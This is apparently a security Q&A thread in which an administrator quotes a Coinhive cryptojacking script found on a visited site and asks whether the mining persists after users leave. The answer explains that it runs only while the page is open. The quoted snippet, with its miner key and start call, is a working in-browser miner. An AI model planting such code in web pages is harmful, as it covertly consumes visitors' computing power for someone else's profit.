I found some of my users visiting a site that seemed to have a Bitcoin mining JS script in its code:
<script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>
My question is, with this are the users still infected even if they navigate away from the page? Do these sort of programs only work while the user has the page open in the browser?
with this are the users still infected even if they navigate away from the page?
No
Do these sort of programs only work while the user has the page open in the browser?
Yes, the script will only run on the website that includes it, while the page is open in the browser
UPGRADE:
More information about this script: https://coin-hive.com/
Coinhive offers a JavaScript miner for the Monero Blockchain (...) that you can embed in your website. Your users run the miner directly in their Browser
And https://coin-hive.com/documentation/miner
The miner runs until you explicitely stop it again or the user navigates away.